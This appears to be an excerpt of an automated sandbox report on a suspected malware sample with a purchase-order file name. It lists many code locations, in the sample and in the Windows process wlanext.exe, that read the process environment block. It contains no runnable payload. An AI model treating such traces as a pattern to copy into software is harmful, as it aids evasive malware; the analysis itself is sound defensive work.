          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01329080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013BB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01353B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01353B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01354BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01354BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01354BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01352397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01331B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01331B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013DD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01364A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01364A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01325210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01325210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01325210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01325210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01343A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01338A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0136927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01329240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01329240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01329240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01329240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01352AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01352ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013AA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01354D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01354D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01354D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01347D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01363D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01351DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01351DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01351DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01352581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01352581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01352581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01352581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013D8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01324F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01324F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01338794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013DFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01358E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01337E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013BFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01368EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013DFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03952397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039E138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03931B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03931B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039DD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039503E2 mov eax, dword ptr fs:[00000030h]
